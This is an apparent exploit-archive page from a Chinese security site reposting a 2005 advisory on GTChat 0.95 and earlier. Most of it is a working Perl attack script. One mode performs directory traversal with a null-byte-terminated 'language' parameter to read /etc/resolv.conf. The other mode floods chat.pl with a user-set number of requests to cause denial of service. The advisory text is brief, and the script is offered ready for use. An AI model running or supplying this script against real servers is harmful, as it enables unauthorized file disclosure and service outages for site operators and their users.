首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
GTChat Remote Denial Of Service And Directory Traversal
来源:x97Rang 作者:b1f 发布时间:2005-08-26  

GTChat Remote Denial Of Service And Directory Traversal

Summary
GT-chat is a fast and comfortable webchat application. Due to use of server push technology and working without a database like mySQL it uses only little server resources, which of course won't affect the performance.

A Directory traversal vulnerability exists in GTChat. GTChat is also vulnerable to denial of service by sending many chat requests sent to the server.

Credit:
The information has been provided by x97Rang.

Details
Vulnerable Systems:
* GTChat versions 0.95 and prior.

Exploit:
#!/usr/bin/perl

use LWP::Simple;

if (@ARGV < 3)
{
print "\nUsage: $0 [server] [path] [mode] [count for DoS]\n";
print "sever - URL chat\n";
print "path - path to chat.pl\n";
print "mode - poc or dos,\n";
print " poc - simple check without DoS and exit,\n";
print " dos - DoS, you must set count for requests in 4 argument.\n\n";
exit ();
}
$DoS = "dos";
$POC = "poc";
$server = $ARGV[0];
$path = $ARGV[1];
$mode = $ARGV[2];
$count = $ARGV[3];
print qq(
###################################
# GTChat <= 0.95 Alpha remote DoS #
# tested on GTChat 0.95 Alpha #
# (c)oded by x97Rang 2005 RST/GHC #
# Respect: b1f, 1dt.w0lf, ed #
################################### );
if ($mode eq $POC)
{
print "\n\nTry read file /etc/resolv.conf, maybe remote system unix...\n";
$URL = sprintf("http://%s%s/chat.pl?language=../../../../../../../../../../etc/resolv.conf%00 HTTP/1.0\nHost: %s\nAccept:*/*\nConnection:close\n\n",$server,$path,$server);
$content = get "$URL";
if ($content =~ /(domain|sortlist|options|search|nameserver|dhclient)/)
{ print "File read successfully, remote system is *nix and $server are VULNERABLE!\n"; exit(); }
if ($content =~ /Fatal error/)
{
print "File read failed, but *Fatal error* returned, $server MAYBE vulnerable, check all output:\n";
print "=== OUTPUT ===============================================================================\n";
print "\n$content\n";
print "=============================================================================== OUTPUT ===\n";
exit();
}
else { print "Hmm.. if you arguments right, then $server NOT vulnerable, go sleep :)\n"; }
}
if ($mode eq $DoS)
{
if (!($count)) { print "\nNeed count for DoS requests, you don't set it, exit...\n"; exit() }
print "\nSend $count DoS requests to $server...\n";
$URL = sprintf("http://%s%schat.pl?language=chat.pl%00 HTTP/1.0\nHost: %s\nAccept:*/*\nConnection:close\n\n",$server,$path,$server);
for ($count_ov = 0; $count_ov != $count; $count_ov++) { $content = get "$URL"; }
print "Done, packets sended.\n";
}



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·WinAce Temporary File Handling
·Ventrilo Denial of Service
·Open DC hub Buffer Overflow
·Home Ftp Server Multiple Vulne
·Raising The Bar For Windows Ro
·Operator Shell (osh) Buffer Ov
·Electronic Mail for UNIX (Elm)
·One Exploit Play More OS
·MyBB finduser Search SQL Injec
·Adobe Version Cue VCNative Pre
·Sun Solaris printd Daemon Remo
·Adobe Version Cue -lib Command
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved